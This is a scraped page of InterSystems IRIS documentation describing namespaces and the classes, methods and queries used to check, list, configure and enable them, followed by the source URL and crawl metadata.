Namespaces Background Information In InterSystems IRIS, any code runs within a namespace. A namespace provides access to data and to code, which is stored (typically) in multiple database files. For an introduction, see “Namespaces and Databases” in the Orientation Guide for Server-Side Programming. Typically you create and configure namespaces via the Management Portal. See “Configuring Namespaces” in the chapter “Configuring InterSystems IRIS” in the System Administration Guide. Available Tools Provides the following class methods: Exists() GetGlobalDest() GetRoutineDest() This class also provides the following query: List() Availability: All namespaces. Includes the following class method: Availability: All namespaces. Enables you to modify and obtain information about the [Namespaces] section of the CPF. (Note that you usually perform this configuration via the Management Portal, as noted above.) The class also provides the List() class query. The class documentation includes examples and details. Availability: %SYS namespace. Enable you to define and use an installation manifest. Among other tasks, you can configure namespaces. Availability: All namespaces. Provides the EnableNamespace() method, which you can use to enable a namespace to work with InterSystems IRIS. This is useful if you create namespaces programmatically. Do not use this method to repair a damaged namespace. In the event of a damaged namespace, contact the InterSystems Worldwide Response Center (WRC) Opens in a new window for assistance. Ignore all other methods in this class. Availability: %SYS namespace. Reminder The special variable $SYSTEM is bound to the %SYSTEM package. This means that instead of ##class(%SYSTEM.class).method(), you can use $SYSTEM.class.method().
https://docs.intersystems.com/healthconnectlatest/csp/docbook/DocBook.UI.Page.cls?KEY=ITECHREF_NAMESPACE
CC-MAIN-2021-25
refinedweb
254
52.56
Details Description) } reversedLinesFileReader.close(); I believe this could be useful for other people as well! Activity - All - Work Log - History - Activity - Transitions Sorry, I didn't notice the radio buttons when I first uploaded... I will provide you with Unit tests if you're interested - I tested the class with a main class and different input files but it's easy to create been? Attached simple maven project with java class and unit tests. @Gary: Let me know if you need anything more Improved javadoc and unit tests. Fixed empty file bug.. I didn't really like the "inefficient" idea of using the BufferedReader to get around the encoding issue... so I read up about encodings in general and I think the solution as provided works for all one byte encodings, UTF-8, UTF-16BE/UTF-16LE and Shift-JIS. For other encodings at the moment an exception is thrown to be on the safe side (but this can be easily extended). Also, now \r alone is treated as newline as well. PS: Added Apache headers and removed author tag. Good to know that it's easy to unambiguously detect CR and LF. There seems to be a lot of spurious files in the zip archive. I'm not sure that the getNewLineMatchByteCount() is as efficient as BufferedReader.readLine() - it seems to process characters multiple times. It could probably be improved by just checking current and previous chars. Also, I don't think it's necessary to encode \n or \r - just use the appropriate characters. There are no tests for multi-block files where there may be lines spanning blocks. Indeed the CRLF pair may span blocks; I'm not convinced that the code handles that correctly. In order for getNewLineMatchByteCount() to detect all CRLF pairs, it generally needs at least 2 characters to be present; this does not seem to be guaranteed. Note: could use a smaller block size to make the test files smaller; probably sensible to compare the results with a forward line reader. It would then be simple to have a directory of various different test files - read the file forward and store the lines; ensure that the reverse reader matches the reversed lines. The field totalBlockCount needs to be a long, not an int. Might simplify the code to use empty arrays rather than null. Sorry for the spurious files, i created the zip with the default utility in OS-X. I think the code addresses most of your questions already: - There are a few tests already (testXxxxSmallBlockSize()) that test the multi-block behaviour for lines that span a block (you can go down to a block size of 1 and it still works, that shows that the algorithm is solid I think) - I think it's clever to encode the newline characters - that way we automatically get the correct byte sequence for multi byte encodings (e.g. UTF-16) and if a one byte-per-char-encoding chose to use different bytes it would also work (performance is no issue for this as it happens only once) - I think about getNewLineMatchByteCount() to make it more efficient - although for the standard ISO case it ends up just being four byte comparisons instead of three. Should make almost no difference but on the pro side it makes the implementation nicely generic. - It's true, there is an issue with block-spanning newlines to be fixed. If a windows newline (\r\n) happens to span a block a wrong extra empty line will be returned. I'll provide a fix for the newline problem and will change totalBlockCount to long. Sorry, you're correct about needing to convert CR and LF. I was forgetting that BufferedReader.readLine() works on the decoded values, so does not need to encode them for comparison. Whereas your code works on bytes, and decodes later. AFAICT, the code depends on the line end byte arrays being sorted order of descending length. This should be documented. Hopefully it's not possible for an encoding to use different lengths for CR and LF! Eventually... there's a new version 0.3 attached. - The block-spanning newline issue is fixed - Comment for the line-end-bytes-array added - The last-line-is-empty-behaviour has been aligned with BufferedReader (and there is a test to check the "BufferedReader Compliancy") - The tests have been split up in two parametrized ones and one standard junit test. ReversedLinesFileReader should be in the org.apache.commons.io.input package along with all the other InputStreams & Readers, so I have moved it. Also fixed some checkstyle issues (removed tabs, javadocs etc) Works like a charm, thanks Georg. I had a similar requirement. I wanted to "chunk-wise" read a HDFS file backwards to allow file browsing similar to the Hadoop namenode's web interface. By clicking a button a user triggers to fetch the previous N lines starting from a specific offset. With a few changes to your ReversedLinesFileReader implementation I was able to implement this functionality. I would suggest to extend your ReversedLinesFileReader to be able to operate on InputStreams and to return the number of consumed bytes (i.e. the number of bytes actually read for "line construction" not the number of buffered bytes). This actually results in a Reverse org.apache.hadoop.util.LineReader. Great to hear that the class is being used already! Can you provide the exact SVN-Location of org.apache.hadoop.util.LineReader? I will try to create a base class for ReversedLinesFileReader that you could use then. Basically, it would be required to support: Text str= new Text(); FSDataInputStream is= FileSystem.get(conf); is.seek(offset); ReversedLinesReader reader= new ReversedLinesReader(is); int bytesConsumed; long bytesConsumedTotal=0L; while(bytesConsumedTotal<treshold && (bytesConsumed=reader.readLine(str))>0) { //... bytesConsumedTotal+= bytesConsumed; } public class ReversedLinesReader { public ReversedLinesReader(InputStream is) { //simply start reading from (positioned) is } public ReversedLinesReader(File file) { //current behaviour seek to end of file } public int readLine(Text text) { //return bytes read and store line in text //alternatively one could return a Pair<String,Integer> to not depend on org.apache.hadoop.io.Text } public String readLine() { //current behaviour } } Version 2.2 has been released and addresses this issue. Hi Georg, We cannot consider this for consideration without: Questions:
https://issues.apache.org/jira/browse/IO-288
CC-MAIN-2016-30
refinedweb
1,044
55.13
HI,i found that it work fine with wikitude 6.0;0-3.4.0 , i'v just upload two screenrecords if that can help finding my issue. The two version run the same www/ folder. We have a 'onDeviceNotSupported' callback which is well executed with device not compatible cordova#7.1.0, android#7.1.1 wikitude 7.2.1-3.5.2: wikitude 6.0.0-3.4.0 hope you can do something Hi Raphael, this was a known issue of SDK 7.0, but was fixed with 7.1. Please verify that the plugin version is 7.2.1. If you are sure that the version is correct please try to use: PackageManager.hasSystemFeature(PackageManager.FEATURE_SENSOR_GYROSCOPE) This should return 'false' on the Wiko Tommy2. Best Regards, Alex hi, Back to this geo-ar project ! I still have not been able to solve my issue. I double check the wikitude version : 7.2.1. I forgot to mention that I use the cordova plugin and so I can not figure out where am I supposed to insert the java code from the post above. thx for your help. Hi, In the case of our cordova sample app there is a MainActivity. In the onCreate of this Activity you should be able to use PackageManger.hasSystemFeature. Please check what this method returns on the wiko tommy 2 and report back. Best Regards, Alex hi, thanks again for your help, for short it looks like "PackageManager.hasSystemFeature (PackageManager.FEATURE_SENSOR_GYROSCOPE)" returns me true. but the way I got this result was more complicated than I had planned, here is what I did: I did not use the wikitude cordova sample app, so I pasted the line System.out.println(PackageManager.hasSystemFeature (PackageManager.FEATURE_SENSOR_GYROSCOPE)); into our own activity located in: "platforms / android / src / our / package / name / MainActivity .Java", The build failed with an error like : you can't call a non static method from a static context. After some research on the internet I came to modify a little this line, our MainActivity became: package our.package.name; import android.os.Bundle; import org.apache.cordova.*; // I added this line too import android.content.pm.PackageManager; public class MainActivity extends CordovaActivity { @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); boolean hasGyro = this.getPackageManager() .hasSystemFeature(PackageManager.FEATURE_SENSOR_GYROSCOPE); System.out.println(" ##### hasGyro ? #####" + hasGyro); // enable Cordova apps to be started in the background Bundle extras = getIntent().getExtras(); if (extras != null && extras.getBoolean("cdvStartInBackground", false)) { moveTaskToBack(true); } // Set by <content src="index.html" /> in config.xml loadUrl(launchUrl); } } I then rebuild, copy the apk on my phone and start a shell with adb: rafiki@rafiki: $ adb shell then: V3933AC:/ $ logcat | grep hasGyro the result in the console: 05-09 12:12:56.423 16470 16470 I System.out: ##### hasGyro ? #####true I did these operations with both wikitude 7.2.1 and 6.0.0 same output each time. Thanks in advance raphael De Sede
https://support.wikitude.com/support/discussions/topics/5000086095
CC-MAIN-2020-45
refinedweb
490
52.56
The Digital Experience team will be hosting a webcast for customers on Friday, February 24th, 2017, on the topic What is New in Digital Experience v9.0. Further details here. Forward This blog entry is replicating a previous post in dwAnswers here: The dwAnswers post did not preserve formatting - this blog entry will. Question/Issue When I first installed the WebSphere Portal product, I chose the name "wpadmin" for my administrator name. The installer automatically created a group named "wpsadmins" for my administrator group. I recently added my LDAP configuration to the Portal server using a federated repository configuration. After doing so and restarting the Portal server, I am seeing the following in the logs: CWWIM4538E Multiple principals were found for the 'wpadmin' principal name. In a cluster - this also affects my Deployment Manager. How can I fix this error? Explanation When WebSphere Portal is first installed, it creates a user and group in a file on the filesystem, e.g. /opt/IBM/WebSphere/wp_profile/config/cells/DEVPortal/fileRegistry.xml The full distinguished name of the user and group in this location, called the File Repository is as follows: uid=wpadmin,o=defaultWIMFileBasedRealm cn=wpsadmins,o=defaultWIMFileBasedRealm The enterprise LDAP contains a user and group with similar names, e.g.: uid=wpadmin,cn=users,dc=ibm,dc=com cn=wpsadmins,cn=groups,dc=ibm,dc=com When an LDAP is added to the configuration, we now have two users named "wpadmin" when we try to login. WebSphere Portal / WebSphere Application Server does not - by design - support and does not attempt to resolve duplicate user names on login with a federated repositories configuration. Let's take another example. Let's suppose we had "twcornwe" the mail intern and "twcornwe" the CEO of the company. We would not want to have "twcornwe" the mail intern to login and suddenly get all the access/permissions that "twcornwe" the CEO has. Most LDAPs do not permit duplicate loginIDs to ensure this scenario does not occur. The same principles / philosophy apply with WAS/Portal, duplicate usernames are not permitted. Removing the LDAP from Portal configuration At the end of the day - you should not have to change your LDAP data to work with WebSphere Portal. The following solution provided will describe how to modify ONLY the WebSphere Portal configuration to remove the duplicates. The solution assumes this is a new system being configured where the LDAP was just added and created a conflict. The solution below should NOT be applied to a running production system - contact IBM Support via a new PMR if a running production system is impacted. The solution detailed will also assume a clustered configuration. The EXACT same steps may be performed on a standalone Portal server as well - the only difference being to modify the files directly on Portal server's under wp_profile, rather than modifying the dmgr_profile file in a cluster. 0) The following steps will manually "undo" most the LDAP configuration steps. We will readd the LDAP in a later step. 1) Backup the following file on your filesystem: <dmgr_profile>/config/cells/DEVPortal/wim/config/wimconfig.xml - the name= on your LDAP may vary slightly. 3) Modify this as follows - removing the final line. <config:realmConfiguration <config:realms <config:participatingBaseEntries 4) Save changes. 5) Backup the following file on your filesystem: <dmgr_profile>/config/cells/DEVPortal/clusters/PortalCluster/resources.xml 6) Open this file in a text editor. Change all instances of the following: from: uid=wpadmin,cn=users,dc=ibm,dc=com to: uid=wpadmin,o=defaultWIMFileBasedRealm Note - if you did not change your Portal administrator to be the LDAP user in ConfigWizard or via wp-change-portal-admin-user, this step will not be required. 7) Change all instances of the following: from: cn=wpadmins,cn=groups,dc=ibm,dc=com to: cn=wpadmins,o=defaultWIMFileBasedRealm 8) Save changes. 9) Backup the following file on your filesystem: <dmgr_profile>/config/cells/DEVPortal/security.xml 10) Open this file in a text editor. Locate the line which begins with: `<userRegistries xmi:type="security:WIMUserRegistry" 11) Change the primaryAdminId= property on this line to the following: primaryAdminId="uid=wpadmin,o=defaultWIMFileBasedRealm" Note - if you did not change your WAS administrator to be the LDAP user in ConfigWizard or via wp-change-was-admin-user, this step will not be required. 12) Save changes. 13) Restart your Deployment Manager. Verify you can login to the DMGR with the wpadmin user located in the file repository (i.e. the one you specified when installing WebSphere Portal). 14) Stop the nodeagent(s) and Portal server(s) if running. Kill the process IDs if you cannot stop via stopNode/stopServer. 15) Run a manual syncNode.sh from the wp_profile/bin directory, e.g. ./syncNode.sh mydmgr.ibm.com 8879 -user wpadmin -password password 16) Portal 7.0+8.0 (skip in 8.5 and later): Modify the following file: /opt/IBM/WebSphere/wp_profile/PortalServer/jcr/lib/com/ibm/icm/icm.properties updating the following parameter in the file: jcr.admin.uniqueName=uid=wpadmin,o=defaultWIMFileBasedRealm 17) Start the nodeagent and Portal server. Verify you can login to Portal. There may be some errors present in SystemOut.log at this point - that's OK, we'll fix those shortly. Removing the Duplicates 1) Login to the Deployment Manager / WAS admin console 2) Left-hand side, Manage Users. 3) Create a new user, name it wpadminFILE or similar 4) Left-hand side, Manage Groups 5) Create a new group, name it wpsadminsFILE or similar. 6) Add the newly created user to the newly created group. 7) Run a manual syncNode.sh from wp_profile/bin, e.g. ./syncNode.sh mydmgr.ibm.com 8879 -user wpadmin -password password 8) Run the following Portal configuration task: ./ConfigEngine.sh wp-change-was-admin-user -DWasUserid=uid=wpadmin,o=defaultWIMFileBasedRealm -DWasPassword=password -DnewAdminId=uid=wpadminFILE,o=defaultWIMFileBasedRealm -DnewAdminPw=newpassword *Note: The -DWasPassword will be the wpadmin password in the file repository / out of the box install. 9) Restart the DMGR. Verify you can login as the new wpadminFILE user. 10) Left-hand side, Manage Users. 11) Delete the wpadmin user. KEEP the wpadminFILE user. 12) Left-hand side, Manage Groups. 13) Delete the wpadmins group. KEEP the wpadminsFILE group. 14) Run the following Portal configuration task: ./ConfigEngine.sh wp-change-portal-admin-user -DWasPassword=password -DnewAdminId=uid=wpadminFILE,o=defaultWIMFileBasedRealm -DnewAdminPw=newpassword -DnewAdminGroupId=cn=wpsadminsFILE,o=defaultWIMFileBasedRealm 15) Restart the nodeagent. 16) Sync nodes. 17) Portal 7.0+8.0 secondary nodes only (skip in 8.5 and later) - run the following configuration task: ./ConfigEngine.sh update-jcr-admin 18) Restart the Portal server. Putting back the LDAP At this point, we now have a Portal system configured with the following user and group: uid=wpadminFILE,o=defaultWIMFileBasedRealm cn=wpsadminsFILE,o=defaultWIMFileBasedRealm Which will avoid the duplicates once we readd the LDAP."/> 3) Modify this as follows - readding the final line that we removed previously. - your name= on your LDAP may vary slightly. 4) Save changes. Sync nodes. 5) Restart the DMGR, nodeagent(s) and Portal server(s). Note: At this point, the CWWIM4538E error should no longer occurs given we had removed the duplicates. 6) If you intended for your WAS administrator to reside in the LDAP - run the following Portal configuration task: ./ConfigEngine.sh wp-change-was-admin-user -DWasPassword=password -DnewAdminId=uid=wpadmin,cn=users,dc=ibm,dc=com -DnewAdminPw=newpassword 7) Sync nodes. Restart the DMGR, nodeagent(s) and Portal server(s). 8) If you intended for your Portal administrator to reside in the LDAP - run the following Portal configuration task: ./ConfigEngine.sh wp-change-portal-admin-user -DWasPassword=password -DnewAdminId=uid=wpadmin,cn=users,dc=ibm,dc=com -DnewAdminPw=newpassword -DnewAdminGroupId=cn=wpsadmins,cn=groups,dc=ibm,dc=com 9) Sync nodes. Restart the Portal server(s). 10) Done! Closing Thoughts If you are able to avoid the duplicate usernames when installing the product by choosing a username that does not reside in the LDAP - that will save a LOT of headaches / make the steps above unnecessary. However, there are situations where it is not always possible to known what LDAP data may exist - in which case the steps above will help get your system to a working configuration without modifying any data in the LDAP itself. IBM Support will be hosting a webcast for customers on Wednesday, November 2nd, 2016, on the topic Best Practices for Staging to Production in WebSphere Portal 8.5. Further details here. Introduction may. WebSphere Portal end users can run into situations where cookies in the web browser are not always cleaned up properly. It can be helpful to have code available which can remove cookies automatically and transparently to the end user. In earlier versions of WebSphere Portal, this was accomplish through a quick bit of javascript code, often enabled in a custom theme. With WebSphere Portal v8 and newer, the HttpOnly attribute is set on cookies which prevents javascript code from cleaning up the cookies. Removing the HttpOnly attribute from the cookie is not recommended, as you leave your end users open to possible cross-site scripting attacks. This article will explore an alternative method to clearing out cookies - use of a portlet on a WebSphere Portal page. The code performs two functions: 1) Clear out the JSESSIONID, LtpaToken, and LtpaToken2 cookies if present in the web browser. 2) Redirect the user to a different location once the cookies are cleared This article will also discuss setting up a page in WebSphere Portal where the portlet can be deployed, however, the page will not be visible to end users. A download link is available at the end of the article with sample code and a sample page in WebSphere Portal. Setting up the Portlet IBM Rational® Application Developer for WebSphere® Software v8.0.4 was used to develop this portlet. However, any software which can create a JSR286 portlet with two-phase rendering capabilities can be used to author the necessary code. Instructions will be detailed specific to Rational Application Developer. 1) Create a new portlet project. I called mine "cookieeater". 2) Select a target runtime of WebSphere Portal 7.0 stub or later. Do not add a project to an EAR. Select JSR286-Basic API with Basic Portlet type. Do not enable Web 2.0 Features. Optionally, you my add an action listener, however it is not required for the code in the portlet. 3) Open the portlet descriptor. Add the a container runtime option of javax.portlet.renderHeaders with value true. 4) Open the portlet descriptor. Update the default namespace to a value of your choice. *Note: My end result in portlet.xml for steps #3-#4 looked like <portlet-app> ... <portlet> ... </portlet> <default-namespace>#default</default-namespace> <container-runtime-option> <name>javax.portlet.renderHeaders</name> <value>true</value> </container-runtime-option> </portlet-app> 5) Open the jsp file under your WebContent folder. Add the following snippet of javascript code: <script type="text/javascript"> <!-- window.location = "" //--> *Note: Modify this location to the actual location you wish to send end users after cookies are cleared out. e.g. 6) Open the java source code for your portlet. Add the following two constants: final String PATH = "/"; final String DOMAIN = ""; *Note: Modify these two constants specific to your configuration. 7) Add the following method to the source code: public void doHeaders(RenderRequest request, RenderResponse response) 8) Within the doHeaders method is where the cookie clearing logic occurs. My code looked like the following: Cookie[] cookies = request.getCookies(); if (cookies != null) { for (Cookie cookie : cookies) { if (cookie.getName().equals("JSESSIONID") || cookie.getName().equals("LtpaToken") || cookie.getName().equals("LtpaToken2")) { cookie.setPath(PATH); cookie.setDomain(DOMAIN); cookie.setMaxAge(0); cookie.setValue(""); response.addProperty(cookie); } } } *Authors' note: Removing the cookies does NOT perform a logout from WebSphere Portal! Do NOT use this code as a substitute for logging out. 9) Export your code to a WAR file. 10) Done with coding! Let's setup our Portal page with this portlet now. 1) Deploy your cookieeater.war file via the "Web Modules" portlet *Author's note: I'm not sure why, but the web.xml file for my portlet contained the following stanza repeated multiple times <welcome-file-list>. Portlet deployment initially failed as a result for me. Manually cleaning up the web.xml file so only a single <welcome-file-list> stanza existed resolved the issue. 2) Create a new page in WebSphere Portal either via the Manage Pages portlet, or, via Edit Mode. I called my page "eatme" and created it under the "Home" label. Give it a friendly URL of "eatme". 3) Add the cookieeater portlet to the page using either the Edit Page Layout portlet in Manage Pages, or, via Edit Mode. 4) Navigate back to your Home label in your theme. You should now notice a page called "eatme". 5) Click the "eatme" page. - Your JSESSIONID, LtpaToken and LtpaToken2 cookies should be cleared out. - You should be redirected to the site specified in the javascript of your jsp. At this point, while the "eatme" page accomplishes 2 of 3 of our end goals, its sitting out there in plain site of end users. Any user who happens to click on the page will have their cookies removed and will be forced to relogin to Portal. Not good. Next steps are to hide this page. 6) Navigate back to your WebSphere Portal. Log back in as an Administrator. 7) Navigate to the Manage Pages portlet. Click the 4th icon to "export" the page. 8) Open the exported page.xml file. Locate the following two lines: </pagecontents> <parameter name="com.ibm.portal.IgnoreAccessControlInCaches" type="string" update="set"><![CDATA[false]]></parameter> 9) Update to the following, adding the new parameter "com.ibm.portal.Hidden" with value "true". </pagecontents> <parameter name="com.ibm.portal.Hidden" type="string" update="set"><![CDATA[true]]></parameter> <parameter name="com.ibm.portal.IgnoreAccessControlInCaches" type="string" update="set"><![CDATA[false]]></parameter> 10) Save changes. 11) Navigate to the Import XML portlet in the Administration area. 12) Import the updated page.xml with the new page parameter added. *Author's note: Any page parameters that begin with com.ibm.portal.* cannot be set via the GUI. The only means to set them is through XMLAccess scripting. 13) The "eatme" page should no longer be visible within your Portal site. 14) Test the Friendly URL of the page, e.g. 15) Your cookies should be removed and you should be redirected to the site specified in the javascript of your jsp. 16) (Optional): Set anonymous permissions on the page and portlet. 17) Enjoy! Feel free to implement and modify for your own specific Portal site. You should be able to send users to this friendly URL as needed within your Portal site to clear out cookies. Sample End Result Portlet and Page: This applies custom themes in Portal 8 that based on Page Builder theme migrated from Portal 7. User may notice strange behaviour with some of the icons with the Search center. The most obvious one will be a magnifier glass next to searchbox dialog or button even when the search query and returned results are otherwise functional. These weird multiple icons behavior are caused by a missing css class called wpthemeAltText This specific style/class is not included in Portal 8 by default. So use may have to account for the by including it in their custom css. Here will be a sampel entry .wpthemeAltText { display: none; } Notes: In portal 8 the applicable style at the location is lotusAltText. So for example Searchbox.html in <profile root>\installedApps\dev01\PA_Search_Center.ear\searchCenter.war\js\ibm\portal\search\SearchCenter\templates will have following entry in default Portal 8 theme <span class="lotusAltText">${resourceBundle.searchAltText}</span> In Pagebuilder themes from Portal 7 here is the equivalent entry <span class="wpthemeAltText">${resourceBundle.searchAltText}</span> You therefore basically have to account for it in Portal 8 as described above OR change the line to match what is already in portal 8. While a rare scenario, allowing the history log for wcm content items could cause problems in saving the item and or the log itself. This happen if grows past the internal default size.. typical errors will look similar to this Error rendering content: com.ibm.workplace.wcm.api.exceptions.DocumentSaveException:XXXX/jcr:versionedNode/icm: copiedValues exceeds its max length. The max length is 5000000 while the value is of length 5000679 XXX/jcr:versionedNode/icm:copiedValues exceeds its max length. The max length is 5000000 while the value is of length 5000679) As part of routine maintenance you may consider truncating the history log Customer may notice that wcm attachments and files resources show no errors during conversion but the documents do not exist in the collection/index Enabling DCS debug shows successful conversion but also show the following message for each attempted conversion "DCS returned an empty string for document" [7/25/13 17:37:56:986 EDT] 0000002d ApplicationDo 1 DCS returned an empty string for document Often this is because the wrong version of the RemoteDSC.zip is in use . The is a new RemoteDCS.zip for each 8.0.0.x CF0X released. Essentially each CF has it owns files. Please open a pmr and contact IBM support if it is not clear you are using the correct files for the CF in use. You)): -! One.) ... --------------------------------------------- ".
https://www.ibm.com/developerworks/mydeveloperworks/blogs/PortalL2Thoughts?maxresults=50&sortby=0&lang=pt_br
CC-MAIN-2017-39
refinedweb
2,897
50.33
This site uses strictly necessary cookies. More Information I want to write a function that is then called by the program 1000ds times to make your own mesh world for users to roam in. eval() is great, i have used it to print maths and texts, and also to call a function. for my game though, i dont need to actively call an action, i need users to write abit of maths, that will then become a function, that the program will then call many times. i.e. .JS is function: function equation(x:float,y:float,z:float):float { return (x*x+y*y+z*z-1); } users can replace / rewrite above function so that: GUI Text: function equation(x:float,y:float,z:float):float { return (Mathf.Sin (x)*Mathf.Cos (y)+z*z-5); } is it possible? it's abit confusing arg 8-/ at the moment I am calling the same eval() thousands of times, and it's twice as slow as calling the maths from a function, so if there is anyway of calling eval() just once to write a function I would love to know about it! Answer by Loius · May 11, 2013 at 04:23 AM If you use Reflection you can get an actual function from its name; depending on how much you trust your user you may need to be creative and, for instance, only allow methods from Mathf to be called. See the answer here for how to use a string to find and call a function. this one causes an error: var st = "function test(){print(1234);}"; var myfunction: Function=eval(st); Assets/Plugins/CreateWorld.js(102,39): BCE0031: Language feature not implemented: BuiltinFunction: Custom. the answer i linked you to is aggresively avoiding the use of eval, the whole point is to not use eval something like this (meaning if you copy and paste this it will not work, it needs changes to fit in your code): var t : Type = Type.GetType("$$anonymous$$athf"); var method : $$anonymous$$ethodInfo = t.Get$$anonymous$$ethod(userFunctionName, BindingFlags.Static | BindingFlags.Public); method.Invoke(null, arguments); ok sounds good ill make a study of it ;) thankyou so much! this line works: var t : System.Type = System.Type.GetType("$$anonymous$$athf"); and also i have to say $$anonymous$$ethodInfo doesnt exist in .JS so does that mean it doesnt support reflection at all? Eval's the only way to let the user execute arbitrary code, but you never want the user to execute arbitrary code because someone will call Game.Win. For something complex like that, without eval, you have to keep a list of functions the user wants to call and then call them in order. It's not a simple problem, but you can do it through Reflection or you can just have a list of options they can use and let them order them however they want. Answer by aldonaletto · May 11, 2013 at 03:56 PM Maybe this article can help you - at first sight, it shows how to compile some code at runtime, and how to use the resulting assembly. Thankyou Aldo, that is pretty difficult, it seems there is a createmethod class with eval(), and i dont understand the article so much it is very advanced. perhaps i should not try to make a string to a method in JS and find an example in C that i could call from JS. oh Louis just put up some code for me to try i will be trying to understand that! Changed name! At last!:) probably I would have to write an external DLL, it's a shame because I have a great program and I wanted to do some competitions to see who can write the most crazy looking procedural 3d functions, but it goes over twice as slow from the web. Draw GUI Text if clicked out of webplayer 1 Answer Andoid enter text without gui 1 Answer v4.6 Create GUI Elements Via Script? 1 Answer Relate font size to screen size in GUISkin 2 Answers Changing 3d text through script 1 Answer EnterpriseSocial Q&A
https://answers.unity.com/questions/453591/difficult-eval-task-write-a-function-but-dont-invo.html
CC-MAIN-2021-31
refinedweb
689
65.76
>> In short, I don't think it's better to have task-counting and fd-counting in memcg.>> It's kmem, but it's more than that, I think.>> Please provide subsys like ulimit.>> So, you think that while kmem would be enough to prevent fork-bombs,> it would still make sense to limit in more traditional ways> (ie. ulimit style object limits). Hmmm....>I personally think this is namespaces business, not cgroups.If you have a process namespace, an interface that works to limit the number of processes should keep working given the constraints you are given.What doesn't make sense, is to create a *new* interface to limit something that doesn't really need to be limited, just because youlimited a similar resource before.
http://lkml.org/lkml/2012/4/17/346
CC-MAIN-2016-30
refinedweb
127
65.32
Status: Personal ramblings, unfinished in many places. Abandon requiements for consistency all ye who enter in.Created: 1999/06/18 This document was an attempt to build logical formulaue as closely as possible on top of the RDF triple abstract syntax. Another more recent investigation in this direction is Notation3. It investigates using XML for logic. In this document: include, assert, truth) Example of trust statemement Quantification (for all, exists) The XML syntax [] and the RDF model [] give the basics for semantics of the Web, but it seems to me we need some conective tissue to work towark the semantic web. Basically, everything we think of as "data" on the Web forms a set of logical statements. We need a unifying logical langauge for data - for the machine interfaces to data systems -- in the same way that HTML was a unifying language for human interfaces to information systems. This document is an attempt at an existence proof to reassure one that the XML/RDF model will be able to meet a number of requirements which have been proposed in the community. These include The need, of course, is to build a logic out of RDF, as naturally as possible. We fail if the syntax becomes drmatically more cumbersome as we add features; we win if we find that higher-oder statements look like natural XML just as simple metadata assertions do. We fail if at every stage we have introduced special XML syntax whose semantic is expressed in English; we win if we find that we can build up the language by introducing new RDF properties - especially those whose semantics can be expressed in RDF and the preceding properties. (Within this document, XML elements with namespace prefix are assumed to be defined as pointing to something the reader can figure out, and unprefixed element names are used for new features which are introduced in this document. ). I assume for the purposes of this paper a syntax for data in XML which is now described in a separate note on syntax. Assertions are not all equal. They are made in different documents by different people with different guarantees. They may be refered to, and even denied explicitly. The context of an assertion is therefore indispensible to its use. Context is inherited though nested XML elements unless an element of the following forms changes that. When an assertion is verified, evidence as to its veracity is accumulated and submitted to subjective criteria of trust assesment. While the eventual trust criteria are subjective, the logic of what is meant when data is put on the Web must be very well defined and unambiguous.. An RDF statement in a what RDF called a model, but I call a Formula, can be reified by four triples. Three are needed to assert the subject, object, and predicates of the assertion. One to assert that the triple is part of the given model (set of triples) -- where more than one model can exist. Reification therefore blows up the storage requirement by a factor of four. There is also a problem when using a simple link between the context formula and the statement, that it is necessary to specify definitively the set of statements in a formula. There are a number of ways of doing this, incluing the DAML list "first/rest" method, giving the number of statements, and giving the relationship as for example "item_2_of_5". As these are inter-convertible, the choice is not fundamental. We will see how reification ends up being replied successively, making the verbosity become quite unnacceptable as a practical technique for repreenting formulae. Therefore, while we will derive each language feature simply by defining a new RDF property, to make it practically useful we will also need a syntax which allows the new langauge to be written less verbosely Reification turns what is an explict statement into a description of a statement which is not specifically asserted, but which is described and can be talked about. In languages this is typically done by quotation. In RDF synatax to date there is now way of doing this, so let as start with that as then we can do anything. There is no specific element for this yet, so let's assume an QUOTE which, which allows one to talk about assertions without asserting them. In the "Ralph said Ora wrote the book" example, "Ora wrote the book" is obviously quoted. We need a away of distinguising between things we said and we stand by, and statements we wish to discuss. This is going to be of primary importance on the Web in which information from many sources is combined. It is a fundamental part of language design. (The PICS label system uses it for example. In metadata, information about information, quotation is obviously essential.). One way would be <quote id=foo <dc:author>Ora</dc:author> </quote> <rdf:description <dc:author>Ralph</dc:author> <http:from>swick@w3.org</http:from> </rdf:description> Here the quoted part says that Ora wrote the book, and then the description following it assert that Ralph made the assertion. This not to be confused with a quote which maintains that it itself was written by Ralph, but for which the present author makes no claim of truth or anything else: <quote id=foo <rdf:description <dc:author>Ralph</dc:author> <http:from>swick@w3.org</http:from> </rdf:description> <dc:author>Ora</dc:author> </quote> If it becomes common, would be even simpler is we defined a shortcut element <head> to mean "about my enclosing parent element": <quote about="theBook"> <head> <dc:author>Ralph</dc:author> <http:from>swick@w3.org</http:from> <follows-from></follows-from> </head> <dc:author>Ora</dc:author> </quote> In fact one could make <quote> basically identical to <rdf:Description> except disavowing of the assertions contained. [This was, I understand, considered by the RDF working group]. (see also daml:imports of Oct 2000 and and Dan's GET/PUT model) Just as it is important to be able to exclude assertions within a document from the set asserted directly by the document, it is equally as important to be able to include assertions which are in fact not in the docoument. This is easy to do with another property. It is, after all, a single assertion indiacting that B should be believed to the extent that you believe A. <foo:bar> <head> <include rdf: <include rdf: <include rdf: </head> </foo:bar> This document, of some type we need not worry about, from the semantic point of view is deemed to include the information in part1.rdf, part2.rdf, and part3.rdf. We use HEAD here as a shortcut for setting the subject to be the current document. (This is NOT a textual inclusion - it only brings across the semantics of the other document, parsed with no context from this one. If the destination document inlcldues HTML for SMIL, the text and graphics for human consumption are NOT invoked in any way!) There is no information provided as to how or why to trust those documents. The statememnt is only about the meaning of this document. It is importrnat to separate in the language the meaning and the trust. (Deciding on a name for this is really diffictl, to get people to follow this very basic logical function. "Vouch"is a a nice word, meaning "asserts the truth of". "Imply" is nice word as it contains the fact that it is a relationship between one document and another: if you don't believe the first you don't have to believe the second. "Assert" or "IsTrue" are other possibilites.) It is overcomplicated to represent this as a binary relationship between the current document and the document vouched for. It realy is a unary relationship true(f) expressed in the current document. That would need an XML shortcut rather than an RDF property, though, which would score less on cleanliness. But it is simpler: <foo:bar> <assert href="part1.rdf" /> <assert href="part1.rdf" /> <assert href="part1.rdf" /> </foo:bar> Alternatively you can make a statement of the truth of the document: <rdf:description <truth>1</truth> </rdf:description> This is strightforward too - and begs the question of what happens if you say "0" instead of "1" </quote> <rdf:description <truth>0</truth> </rdf:description> We don't have a form for logical expressions for the semantic web, although of course logical expression in human readers documents are covered by MathML. The practical need for logical expressions has been apparent in the IETF's work on profiling in the "conneg" group, and in the W3C's internal work on access control. (No comment needs to be made about the huge number of languages which allow logical expression. In the classification of languages, normally logic is introduced before the ability 